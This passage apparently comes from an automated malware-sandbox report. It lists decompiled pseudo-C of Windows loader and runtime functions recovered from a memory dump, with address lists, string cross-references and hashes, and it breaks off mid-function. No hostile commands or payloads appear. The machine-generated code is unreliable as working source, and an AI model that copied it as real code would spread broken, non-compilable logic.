				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E03659730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E036DA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E036DA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x3708b04 >> 0x14) + (_v44 -  *0x3708b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E03637D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E036D138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E03637D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E036CFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x3708724 & 0x00000008) != 0) {
						E036D52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E036E15B5(0x3708ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x036e0eb7
0x036e0eb9
0x036e0ec0
0x036e0ec2
0x036e0ecd
0x036e105b
0x036e105b
0x036e1061
0x036e1066
0x036e1066
0x036e106b
0x036e1073
0x036e1073
0x036e0ed3
0x036e0ed6
0x036e0edc
0x036e0ee0
0x036e0ee7
0x036e0ef0
0x036e0ef5
0x036e0efa
0x036e0efc
0x036e0efd
0x036e0f03
0x036e0f04
0x036e0f06
0x036e0f07
0x036e0f09
0x036e0f0e
0x036e0f14
0x036e0f23
0x036e0f2d
0x036e0f34
0x036e0f34
0x036e0f14
0x036e0f52
0x00000000
0x00000000
0x036e0f58
0x036e0f73
0x036e0f74
0x036e0f79
0x036e0f7d
0x036e0f80
0x036e0f86
0x036e0fab
0x036e0fb5
0x036e0fc6
0x036e0fd1
0x036e0fe3
0x036e0fd3
0x036e0fdc
0x036e0fdc
0x036e0feb
0x036e1009
0x036e1009
0x036e1015
0x036e1027
0x036e1017
0x036e1020
0x036e1020
0x036e102f
0x036e103c
0x036e103c
0x036e1048
0x036e1050
0x036e1050
0x036e1055
0x00000000
0x036e1055
0x036e0f88
0x036e0f9e
0x036e0fa2
0x036e0fa9
0x00000000
0x00000000
0x00000000
0x036e0fa9
0x00000000

Strings

`, xrefs: 036E0F16

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 684f05cea9f42945d92e03490b4bc5a2c69a6758e6126306a49a80be2692e9ed
Instruction ID: a384a077b39aaa04aff548a095f0c672b706d8349d98f0c6dda5ce932aa8232f
Opcode Fuzzy Hash: 684f05cea9f42945d92e03490b4bc5a2c69a6758e6126306a49a80be2692e9ed
Instruction Fuzzy Hash: 8F51C1712053819FD324DF29D984B2BB7E5FBC5314F04092DF9969B290DB70E80ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 0364F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0364F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03634120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03659830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03659990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E036595D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xbb2bc81a
							_t109 = L03634620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2002bb2b
								E0365F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2002bb2b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E036595D0();
										L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0364f0d3
0x0364f0d9
0x0364f0e0
0x0364f0e7
0x0364f0f2
0x0364f0f4
0x0364f0f8
0x0364f100
0x0364f108
0x0364f10d
0x0364f115
0x0364f116
0x0364f11f
0x0364f123
0x0364f124
0x0364f12c
0x0364f130
0x0364f134
0x0364f13d
0x0364f144
0x0364f14b
0x0364f152
0x0368bab0
0x0368bab0
0x0364f158
0x0364f158
0x0364f15a
0x0364f160
0x0364f165
0x0364f166
0x0364f16f
0x0364f173
0x0368baa7
0x0368baa7
0x0368baab
0x00000000
0x0364f179
0x0364f179
0x0364f18d
0x0364f191
0x0368baa2
0x00000000
0x0364f197
0x0364f19b
0x0364f1a2
0x0364f1a9
0x0364f1af
0x0364f1b2
0x0364f1b6
0x0364f1b9
0x0364f1c0
0x0364f1c4
0x0364f1d8
0x0364f1df
0x0364f1e3
0x0364f1e6
0x0364f1eb
0x0364f1ee
0x0364f1f4
0x0364f20f
0x0368bab7
0x0368babb
0x0368bacc
0x0368bad1
0x0364f215
0x0364f218
0x0364f226
0x0364f22b
0x00000000
0x0364f22b
0x0364f1f6
0x0364f1f6
0x0364f1f9
0x0364f1fb
0x0364f1fb
0x0364f1f4
0x0364f191
0x0364f173
0x0364f152
0x0364f203

Strings

@, xrefs: 0364F124

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: cc67a535086a055a0a774b5d9a187f469cf623e2662d9fd4675eea256887e791
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 68516B75504714AFC321DF29C840A6BBBF9FF48710F008A2EF9959B690E7B4E914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 03693540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03693540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x370d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03650BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03693706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0365FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03693540;
						E0365FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0366DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E036A0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E036597C0();
					}
					return E0365B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03693971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03693884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0365FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03659650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03693787(_a4,  &_v352, _t80);
						}
					}
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E036595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x03693552
0x0369355a
0x0369355d
0x03693566
0x03693567
0x0369357e
0x0369358f
0x036935a1
0x036935a5
0x0369366b
0x0369366b
0x0369366d
0x03693672
0x03693679
0x03693685
0x0369368d
0x0369369d
0x036936a7
0x036936b8
0x036936c6
0x036936c7
0x036936dc
0x036936e1
0x036936e7
0x036936e9
0x036936e9
0x03693703
0x03693703
0x036935b5
0x036935c0
0x036935c4
0x00000000
0x00000000
0x036935ca
0x036935d7
0x036935e2
0x036935e6
0x036935e8
0x036935f5
0x036935fa
0x03693603
0x03693604
0x03693609
0x0369360a
0x03693612
0x03693613
0x0369361e
0x03693622
0x03693628
0x0369362f
0x0369362f
0x03693636
0x03693638
0x0369363b
0x03693642
0x03693642
0x03693636
0x03693657
0x03693657
0x0369365c
0x03693662
0x03693669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0369358F

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: ca6a15b14f997da2ddacb596c67392bca556e4da22ade02f28757c11b52a7f57
Instruction ID: 91daf68aee888bf4b4d2461242434c8f6007110b5c5cc35603ab8e222efca4ae
Opcode Fuzzy Hash: ca6a15b14f997da2ddacb596c67392bca556e4da22ade02f28757c11b52a7f57
Instruction Fuzzy Hash: 65413AB5D0162C9BDF21DA50CC84FDEB77CAB44714F1045EAEA09AB240DB705E98CF99

Uniqueness

Uniqueness Score: -1.00%

Function 036E05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E036E05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E036E07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03659730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E036DA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E036DA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E036E1293(_t79, _v40, E036E07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03637D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E036D138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x036e05c5
0x036e05ca
0x036e05d3
0x036e06db
0x036e06db
0x036e06dd
0x036e06e3
0x036e06e3
0x036e05dd
0x036e05e7
0x036e05f6
0x036e0600
0x036e0607
0x036e0610
0x036e0615
0x036e061a
0x036e061c
0x036e061e
0x036e0624
0x036e0625
0x036e0627
0x036e0628
0x036e0631
0x036e0640
0x036e064d
0x036e0654
0x036e0654
0x036e0631
0x036e066d
0x036e0674
0x00000000
0x00000000
0x036e0692
0x036e069e
0x036e06b0
0x036e06a0
0x036e06a9
0x036e06a9
0x036e06b8
0x036e06d6
0x036e06d6
0x00000000

Strings

`, xrefs: 036E0633

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: d30e2e20a97376fdc84b4773f1d6b6f129f1bfbc03d43dc5567dde10728132db
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: F93104326043456BE720DE66CD44F97BBD9EBC4754F084229F954DB280D7B0E918CB95

Uniqueness

Uniqueness Score: -1.00%

Function 03693884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03693884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03659650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03634620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03659650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x03693893
0x03693896
0x03693899
0x0369389f
0x036938a0
0x036938a4
0x036938a9
0x036938ac
0x036938ad
0x036938ae
0x036938af
0x036938b1
0x036938b4
0x036938bb
0x036938bc
0x036938bd
0x036938c4
0x036938c8
0x036938ca
0x036938ca
0x036938d5
0x0369393e
0x03693940
0x03693942
0x03693952
0x03693954
0x03693961
0x03693961
0x03693967
0x0369396e
0x0369396e
0x03693947
0x0369394c
0x00000000
0x0369394c
0x036938ea
0x036938ee
0x036938f8
0x036938f9
0x036938ff
0x03693900
0x03693902
0x03693903
0x0369390b
0x0369390f
0x03693950
0x00000000
0x03693950
0x03693915
0x0369391d
0x0369391d
0x03693922
0x03693926
0x00000000
0x03693928
0x0369392b
0x0369392b
0x03693935
0x03693937
0x03693937
0x00000000
0x03693935
0x03693926
0x036938f0
0x00000000

Strings

BinaryName, xrefs: 036938B4

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: 1d3f0016ff463c9e742deb3883a4c3734049a88bffab8741b4e058c041059eb3
Instruction ID: 475a18bc4ea925c504a1d1a50864e19793d5c674ada1fc84901d28bba2d1cdb1
Opcode Fuzzy Hash: 1d3f0016ff463c9e742deb3883a4c3734049a88bffab8741b4e058c041059eb3
Instruction Fuzzy Hash: 1231F47A901619AFEF15DB58C945E7BF7BCEB40720F21416AE914AB350E7309E00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0364D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0364D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x370d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03634120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0365B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E036598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E036595D0();
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0364d29c
0x0364d2a6
0x0364d2b1
0x0364d2b5
0x0364d2b6
0x0364d2bc
0x0364d2bd
0x0364d2be
0x0364d2bf
0x0364d2c2
0x0364d2c4
0x0364d2cc
0x0364d384
0x0364d34b
0x0364d34f
0x0364d350
0x0364d351
0x0364d35c
0x0364d35c
0x0364d2d6
0x0364d2da
0x0364d2e1
0x0364d361
0x0364d369
0x0364d36d
0x0364d2e3
0x0364d2e3
0x0364d2e3
0x0364d2e5
0x0364d2ed
0x0364d2f5
0x0364d2fa
0x0364d302
0x0364d303
0x0364d30b
0x0364d30f
0x0364d313
0x0364d318
0x0364d31c
0x0364d320
0x0364d379
0x0364d37d
0x00000000
0x00000000
0x0368affe
0x0368b001
0x0368b011
0x00000000
0x0364d322
0x0364d322
0x0364d330
0x0364d337
0x0364d35d
0x0364d339
0x0364d33f
0x0364d38c
0x0364d38c
0x0364d33f
0x0364d349
0x00000000
0x0364d349

Strings

@, xrefs: 0364D303

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4ff26f0a00ea8f558fe86a6366e0fcfcdb4100e5af96bd2105cbbd8b8a24f571
Instruction ID: 3a66f046557e562b569f88f7a58ff903b0a9070dfb86bfc24be54d0b7e59045f
Opcode Fuzzy Hash: 4ff26f0a00ea8f558fe86a6366e0fcfcdb4100e5af96bd2105cbbd8b8a24f571
Instruction Fuzzy Hash: 03318FB5D08305DFC722DF28C98096BBBE8EB8A654F04092EF99487211E635DD05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03621B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03621B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0365BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0365A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0365A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03634620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x03621b8f
0x03621b9a
0x03621b9c
0x03621b9e
0x03621ba3
0x03677010
0x03677010
0x00000000
0x03621ba9
0x03621ba9
0x03621bae
0x00000000
0x03621bc5
0x03621bca
0x03621bcf
0x03621bd0
0x03621bd1
0x03621bd2
0x03621bd6
0x03621bdc
0x03621be0
0x03676ffc
0x03677000
0x00000000
0x03677006
0x03677009
0x03677009
0x03621be6
0x03621bec
0x03621c0b
0x03621c0b
0x03621c0c
0x03621c11
0x03621c12
0x03621c15
0x03621c1b
0x03621c1f
0x03621c31
0x03621c33
0x03677026
0x03677026
0x03621c21
0x03621c24
0x03621c24
0x03621bee
0x03621bee
0x03621bf2
0x03621c3a
0x03621bf4
0x03621bf4
0x03621c05
0x03621c05
0x03621c09
0x03621c3e
0x00000000
0x00000000
0x00000000
0x03621c09
0x03621bec
0x03621be0
0x03621bae
0x03621c2e

Strings

WindowsExcludedProcs, xrefs: 03621BC5

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 21b975b672dcee957b2ab34febf05d351bf97673746a86a6012c94a68c6f77dd
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 2121B67A605A38ABCB22DB55C940FAFBBADAB43650F1A4465FD049B300D634DD019BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0363F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0363F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
